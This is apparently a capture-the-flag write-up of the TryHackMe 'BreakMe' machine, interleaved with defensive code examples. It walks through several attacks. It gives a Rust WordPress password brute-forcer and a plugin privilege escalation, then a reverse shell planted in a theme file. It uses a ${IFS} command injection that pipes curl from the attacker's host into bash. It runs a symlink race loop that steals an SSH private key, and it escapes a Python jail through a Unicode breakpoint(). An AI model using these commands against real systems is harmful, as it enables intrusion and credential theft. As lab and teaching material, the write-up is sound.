# BreakMe (THM)

#### Hello everyone again. Today we are doing BreakMe from THM, shall we?

## Enum

#### Port scanning.

<figure><img src="/files/PLnfUZqlf7uV6XhYFnC9" alt=""><figcaption></figcaption></figure>

#### I scanned with my own tool, web\_tester. If you would like to try it, you can find it here.

<https://github.com/Cythonic1/web_tester>

#### As we can see, ports 22 and 80 are open, and there is a `manual` directory. Let's dig deeper and see what we have.

## Initial Access

#### After some searching I found a directory called `wordpress`, which seems to contain the main website.

<figure><img src="/files/RsV0or09PgVUECqK63o5" alt=""><figcaption></figcaption></figure>

#### After a long session of searching, I found something interesting using wpscan.

<figure><img src="/files/01Tzfuq14QjzgptSTakq" alt=""><figcaption></figcaption></figure>

#### Two users. As we all know, when you enter a wrong password for a valid username in WordPress, you get a message saying the password is incorrect, which confirms that the username exists, as shown below.

<figure><img src="/files/zjDX4RDC4vdLOGe7VTXh" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/sl76R2DpW5pi4XDuTjU0" alt=""><figcaption></figcaption></figure>

#### With that, I decided to write a simple Rust script to brute force the password.

```rust
use reqwest::{blocking::Client, cookie::Jar};
use std::{
    collections::HashMap,
    fs::File,
    io::{BufRead, BufReader},
    sync::Arc,
};
use threadpool::ThreadPool;

/// Sends one login attempt. The form fields are the ones the browser posts:
/// log=asd&pwd=asd&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.187.97%2Fwordpress%2Fwp-admin%2F&testcookie=
fn test(client: Client, password: &str, target: &str) {
    let mut params = HashMap::new();
    params.insert("log", "admin");
    params.insert("pwd", password);
    params.insert("wp-submit", "Log in");
    params.insert("redirect_to", "http://10.10.187.97/wordpress/wp-admin/");
    // params.insert("testcookie", "1");

    let res = client
        .post(target)
        .form(&params) // sent as application/x-www-form-urlencoded by default
        .send()
        .expect("Error while sending the request");

    let status = res.status();
    let body = res.text().expect("Error while reading the response");
    // println!("{:#}", body);
    // A failed login re-renders the form with "... password ... is incorrect."
    if status.is_success() && !body.contains("incorrect.") {
        println!("Password Found : {password}");
    }
}

fn main() {
    let jar = Arc::new(Jar::default());
    let pool = ThreadPool::new(30);
    let file = File::open("/home/pythonic/Downloads/rockyou.txt").expect("Error while opening the file");
    let target = "http://10.10.187.97/wordpress/wp-login.php";
    let client = Client::builder()
        .cookie_store(true) // enable cookie storage
        .cookie_provider(jar) // share one jar between all workers
        .build()
        .expect("Error while building client");

    let reader = BufReader::new(file);

    // One wordlist line per job; the pool keeps 30 requests in flight.
    for line in reader.lines() {
        let client_clone = client.clone();
        pool.execute(move || {
            if let Ok(password) = line {
                test(client_clone, &password, target);
            }
        });
    }

    pool.join();
}
```

#### You can find the whole code here.

<https://github.com/Cythonic1/WP_brute_force>

#### After running the code, I indeed found it.

<figure><img src="/files/AB7hBo7duuqMKInp7CEB" alt=""><figcaption></figcaption></figure>

```text
username : bob
password : soccer
```

#### After some more searching, I found this.

```text
[+] wp-data-access
 | Location: http://10.10.231.172/wordpress/wp-content/plugins/wp-data-access/
 | Last Updated: 2024-09-18T00:01:00.000Z
 | [!] The version is out of date, the latest version is 5.5.14
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | [!] 3 vulnerabilities identified:
 |
 | [!] Title: WP Data Access < 5.3.8 - Subscriber+ Privilege Escalation
 |     Fixed in: 5.3.8
 |     References:
 |      - https://wpscan.com/vulnerability/7871b890-5172-40aa-88f2-a1b95e240ad4
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1874
 |      - https://www.wordfence.com/blog/2023/04/privilege-escalation-vulnerability-patched-promptly-in-wp-data-access-wordpress-plugin/
 |
 | [!] Title: Freemius SDK < 2.5.10 - Reflected Cross-Site Scripting
 |     Fixed in: 5.3.11
 |     References:
 |      - https://wpscan.com/vulnerability/39d1f22f-ea34-4d94-9dc2-12661cf69d36
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33999
 |
 | [!] Title: WP Data Access < 5.5.9 - Cross-Site Request Forgery
 |     Fixed in: 5.5.9
 |     References:
 |      - https://wpscan.com/vulnerability/4fe0d330-6511-4500-ac3f-b9bb944b8f0e
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43295
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/85a33508-71f2-4aa1-8d51-667eb0690fbd
 |
 | Version: 5.3.5 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.231.172/wordpress/wp-content/plugins/wp-data-access/readme.txt
```

#### Which means we have two CSRF and one PE in our current state. Let's look further into the PE to try to upgrade our user to admin.

So I found this.

[Privilege Escalation Vulnerability Patched Promptly in WP Data Access WordPress Plugin](https://www.wordfence.com/blog/2023/04/privilege-escalation-vulnerability-patched-promptly-in-wp-data-access-wordpress-plugin/)

#### It states that the problem is that the WP Data Access plugin does not check whether the user is authorized to change their own role, meaning any user with a low-privileged account can change their role to administrator.

<figure><img src="/files/y2f7mphXwlgtZPg0ZSDc" alt=""><figcaption></figcaption></figure>

#### As you can see in the Burp image above, I added `wpda_role[]=administrator` to the request, which makes us admins, as you can see in the second image.

For now, let's get an initial foothold on the machine.

#### Getting the initial foothold was easy: just navigate to Tools → Theme File Editor. Then:

<figure><img src="/files/jmBcajdGmt1Q6AyuYuT4" alt=""><figcaption></figcaption></figure>

#### Choose `404.php` and paste your reverse shell. Make sure to change the theme you are editing; I am not sure why, but I was having issues with the original one. Anyway, that should be it.

<figure><img src="/files/qFJ1kTQf3Cmx5F3AmO2L" alt=""><figcaption></figcaption></figure>

#### And yeah.

## John

#### After that I started enumerating the machine and found a user called john whose home directory we have access to. Then I saw this.

<figure><img src="/files/g3p5noHCtd6Cuj1Zd2lv" alt=""><figcaption></figcaption></figure>

#### So john has a PHP server running on port 9999, and we need a way to tunnel to it to see what that server is serving. We can use a tool called chisel.

<https://github.com/jpillora/chisel>

#### So I grabbed the latest release.

```bash
www-data@Breakme:/tmp$ wget http://10.11.96.110:8000/chisel_1.10.1_linux_amd64
```

#### The command above runs on the target machine and downloads the binary there from a Python HTTP server opened on my local machine:

```bash
python3 -m http.server 8000
```

#### After that we run this on our machine:

```bash
chisel server --reverse --port 8001
```

#### And the following on the target system:

```bash
www-data@Breakme:/tmp$ ./chisel_1.10.1_linux_amd64 client 10.11.96.110:8001 R:9999:localhost:9999
```

#### This connects to port 8001 on our machine and reverse-forwards port 9999 of the target machine to port 9999 on our machine.

And we will see this page.

<figure><img src="/files/JNnchVVTFzoiNIL0l7cO" alt=""><figcaption></figcaption></figure>

#### After some testing, I saw that it deletes spaces by default.

<figure><img src="/files/gpWp6PVOO1WWtVcnKMX4" alt=""><figcaption></figcaption></figure>

#### As you can see, it trims all the spaces, so we may be able to do something if we find a trick to bypass this.

There is a shell variable called IFS (the internal field separator). On Unix-based systems its default value is whitespace, so if we can inject it in place of a space we may be able to execute the command.

<figure><img src="/files/I6vdfCt0VFq2a7W5HlyS" alt=""><figcaption></figcaption></figure>

#### As you can see, we wrapped it as `${IFS}`, the shell's variable substitution syntax, so it expands to a space after the filter has run, and we are able to execute the command.
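The defensive counterpart to the filter above, as an added example in Python (the box's app is PHP, so this is not its code): the space-stripping filter next to an allowlist that never hands the value to a shell. The `ping` wrapper is an assumption about what the form does; the page only shows that spaces are removed and that `${IFS}` gets through.

```python
import re

# RFC 1123-style hostname or dotted IPv4: the only shape the field should accept.
HOST_RE = re.compile(r"^(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")

def space_stripping_filter(user_input: str) -> str:
    """The page's observed behaviour: spaces are deleted before the value reaches the shell."""
    return user_input.replace(" ", "")

def vulnerable_shell_line(user_input: str) -> str:
    """Assumed (not from the page): the app builds a shell string around the field.
    `${IFS}` survives the filter and the shell expands it to whitespace, so the
    pipe-separated commands run exactly as if spaces had been allowed."""
    return "ping -c 1 " + space_stripping_filter(user_input)

def hardened_argv(user_input: str):
    """Allowlist the shape of the value and pass it to subprocess.run(argv) with
    shell=False: each element reaches execve verbatim, so `|`, `$`, `{` and IFS
    have no meaning, and anything that is not a hostname is rejected outright.
    Returns the argv list, or None when the value must be refused."""
    host = user_input.strip()
    if len(host) > 253 or not HOST_RE.fullmatch(host):
        return None
    return ["ping", "-c", "1", host]
```

Deleting characters the attacker needs is a denylist, and the shell has more than one way to spell a space; the allowlist rejects the whole class of inputs, whichever spelling is used.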

<figure><img src="/files/AP8ey8Jnd5UAf97GZFff" alt=""><figcaption></figcaption></figure>

#### With that we can easly now get a shell.

<figure><img src="/files/zSe08H1cFfru9Hg7N5i7" alt=""><figcaption></figcaption></figure>

#### A simple reverse shell will do. Now we just need to set up the Python server.

```bash
|curl${IFS}http://10.11.96.110:8000/shell.sh|bash
```

#### The final payload will be something like this. Do not forget to set up a listener.

<figure><img src="/files/3ig7zoaWVonwZtZqiRQm" alt=""><figcaption></figcaption></figure>

#### And here we are as john.

<figure><img src="/files/YkORcazgxRLoeIuQS98a" alt=""><figcaption></figcaption></figure>

#### And this is our first flag. A long run.

## Youcef

#### After that I decided to generate an SSH key pair using ssh-keygen.

```bash
ssh-keygen -f john
```

#### This command generates a public and private key for john.

Just append the `.pub` key to `.ssh/authorized_keys`, copy the private key to your machine, change its permissions to 600, and you should be able to log in via SSH, which is much better.

<figure><img src="/files/cYP0VCA8wy3yJx3XaWjc" alt=""><figcaption></figcaption></figure>

#### Now we need to get to the user youcef. When we look there we find a `readfile` binary, but we do not have access to its source code.

So we need to reverse engineer it.

<figure><img src="/files/nKpZvr59todBnu1BC2Gu" alt=""><figcaption></figcaption></figure>

#### To begin with, we can see that there are a lot of checks:

1. Whether the number of arguments is 2.
2. Whether the UID of the user is 1002 (which is john's UID).
3. Whether the file is a symbolic link.
4. Whether the file name contains `flag` or `id_rsa`.

[Abusing Time-Of-Check Time-Of-Use (TOCTOU) Race Condition Vulnerabilities in Games, Harry Potter Style | Trustwave](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/abusing-time-of-check-time-of-use-toctou-race-condition-vulnerabilities-in-games-harry-potter-style/)

#### As we can see, the code contains a race condition. Why?

First, because each check is separate from the actual read, it may be possible to pass the checks and still read a file that does not meet the conditions. We could create a symbolic link that points to youcef's id\_rsa, but on its own that does not help: the permissions that apply are those of the original file, so we would not be able to read it. Do not forget, though, that readfile has the SUID bit set, meaning it executes as youcef. So if we can create the symbolic link and keep switching the file between a symlink and a normal file, we can exploit the race condition: the check sees the normal file while the read hits the symlink.

```bash
while true; do ln -sf /home/youcef/.ssh/id_rsa key; rm key; touch key; done &
```

#### This loop creates a symbolic link to id\_rsa, removes it, recreates `key` as a normal file, and repeats forever.

```bash
for i in {1..50}; do /home/youcef/./readfile key; done
```

#### This is where we exploit the race condition: we use the readfile binary to read the file's contents with youcef's permissions, and after enough attempts we will eventually see the key.
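The fix for this class of bug is to stop checking a path and then opening the path a second time. The following is an added example (Python, not the box's readfile binary): the racy check-then-open pattern next to a version that opens once with `O_NOFOLLOW` and validates the descriptor it then reads from, so there is no second lookup to race. The temp files, the `demo()` layout and the swap hook that stands in for the race window are constructed.

```python
import errno
import os
import stat
import tempfile

FORBIDDEN = ("flag", "id_rsa")  # the name filter readfile applies, mirrored here

def racy_read(path, between_check_and_use=lambda: None):
    """Check the path, then open the path again, as readfile does. The hook
    models the gap in which the page's loop swaps `key` for a symlink."""
    if os.path.islink(path) or any(b in os.path.basename(path) for b in FORBIDDEN):
        return None
    between_check_and_use()
    with open(path, "rb") as f:  # second lookup: follows whatever is at `path` now
        return f.read()

def safe_read(path):
    """Open once with O_NOFOLLOW, then check and read the same descriptor."""
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_CLOEXEC)
    except OSError as e:
        if e.errno in (errno.ELOOP, errno.ENOENT):  # ELOOP: last component is a symlink
            return None
        raise
    try:
        if not stat.S_ISREG(os.fstat(fd).st_mode):
            return None
        # Name check on the kernel's record of the open file (Linux /proc), not on the argument.
        opened = os.readlink(f"/proc/self/fd/{fd}") if os.path.isdir("/proc/self/fd") else os.path.realpath(path)
        if any(b in os.path.basename(opened) for b in FORBIDDEN):
            return None
        return os.read(fd, 4096)
    finally:
        os.close(fd)

def demo():
    """Constructed layout: a secret id_rsa, a harmless `key`, a plain notes file,
    and a swap that turns `key` into a symlink between the check and the open."""
    with tempfile.TemporaryDirectory() as d:
        secret, key, notes = (os.path.join(d, n) for n in ("id_rsa", "key", "notes.txt"))
        for p, text in ((secret, "PRIVATE KEY (constructed)"), (key, "harmless"), (notes, "hello")):
            with open(p, "w") as f:
                f.write(text)
        def swap():
            os.remove(key)
            os.symlink(secret, key)
        leaked = racy_read(key, swap)  # the race wins: secret returned
        blocked = safe_read(key)       # `key` is now a symlink: refused
        normal = safe_read(notes)      # an ordinary file is still readable
        return leaked, blocked, normal
```

For a SUID helper the descriptor-based checks are the minimum; dropping the elevated privileges before the read, or not shipping a SUID file reader at all, removes the incentive for the race entirely.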

<figure><img src="/files/0kh1AaF7upcAXmO3P89p" alt=""><figcaption></figcaption></figure>

#### And after that we just crack it with john.

```bash
ssh2john key_j > hash
```

#### key\_j is your file containing the key.

<figure><img src="/files/yj9HgmFbAaJo3EC3CPKC" alt=""><figcaption></figcaption></figure>

## Root

#### Now for the final run, to become root.

<figure><img src="/files/BcT1MC8VNgbdJLhOsiHF" alt=""><figcaption></figcaption></figure>

#### We can see that the current user has root access to `jail.py`, so let's see what it contains.

<figure><img src="/files/bbheN2jWCwtOqU1Zqaqq" alt=""><figcaption></figcaption></figure>

#### So it is a program that allows us to execute interactive Python code, but it is very restricted, meaning we cannot simply run anything.

This could be simple: Python has a built-in function called breakpoint().

[Python breakpoint() | DigitalOcean](https://www.digitalocean.com/community/tutorials/python-breakpoint)

#### If we can execute this function in the interactive shell, we will be able to run whatever code we want.

<figure><img src="/files/wiqpSdLgzcBIS3TquxtX" alt=""><figcaption></figcaption></figure>

#### Surely we will not be able to, right? What about some tricks? We can use a Unicode spelling, hoping that we may be able to bypass the filter.

```python
𝘣𝘳𝘦𝘢𝘬𝘱𝘰𝘪𝘯𝘵()  # the tokenizer NFKC-normalizes the identifier to breakpoint
```

#### The code above has been taken from:

[Shirajuki - A CTF player from Norway, @iku-toppene, @bootplug, @corax, @rumbleinthejungle and @cybersalmons](https://shirajuki.js.org/blog/pyjail-cheatsheet#unicode-bypass)
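Why the look-alike letters work, and how a jail author would check for them, as an added example (Python, not the box's `jail.py`, whose filter we never see): a substring denylist on the raw source next to a check that parses first and inspects identifiers, which the tokenizer has already NFKC-normalized, plus the `sys.breakpointhook` setting that makes `breakpoint()` inert regardless. The denylist contents are constructed.

```python
import ast
import sys
import unicodedata

DENY = {"breakpoint", "exec", "eval", "__import__", "open"}  # constructed denylist
PAYLOAD = "𝘣𝘳𝘦𝘢𝘬𝘱𝘰𝘪𝘯𝘵()"  # the page's Unicode spelling of breakpoint()

def naive_filter(src: str) -> bool:
    """Substring match on the raw source: the mathematical-italic letters are not
    the bytes 'breakpoint', so this check lets the payload through."""
    return not any(word in src for word in DENY)

def ast_filter(src: str) -> bool:
    """Parse first, then inspect names. PEP 3131 makes the tokenizer NFKC-normalize
    every identifier, so the node id is the plain 'breakpoint' whatever the input used."""
    try:
        tree = ast.parse(src)
    except SyntaxError:
        return False
    for node in ast.walk(tree):
        if isinstance(node, ast.Name):
            ident = node.id
        elif isinstance(node, ast.Attribute):
            ident = node.attr
        else:
            continue
        if unicodedata.normalize("NFKC", ident) in DENY:  # redundant after parsing, explicit on purpose
            return False
    return True

def normalized_identifier(text: str) -> str:
    """What the interpreter sees for an identifier written with look-alike letters."""
    return unicodedata.normalize("NFKC", text)

def disarm_breakpoint() -> None:
    """Belt and braces for any interpreter exposed to untrusted input: make the
    builtin a no-op, the same effect as PYTHONBREAKPOINT=0 in the environment.
    A denylist is not a sandbox; not running the jail as root is the real fix."""
    sys.breakpointhook = lambda *args, **kwargs: None

def breakpoint_is_disarmed() -> bool:
    return sys.breakpointhook is not sys.__breakpointhook__
```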

#### Now that we have entered debug mode, we can execute anything.

<figure><img src="/files/cFC4NKhYDf3pEy6hbioF" alt=""><figcaption></figcaption></figure>

#### And as simple as that we have root access. 😁.

<figure><img src="/files/pMGZcdioXuFcwcnTZ9kw" alt=""><figcaption></figcaption></figure>

#### In the end, I hope you enjoyed it, and thank you for reading. 👹


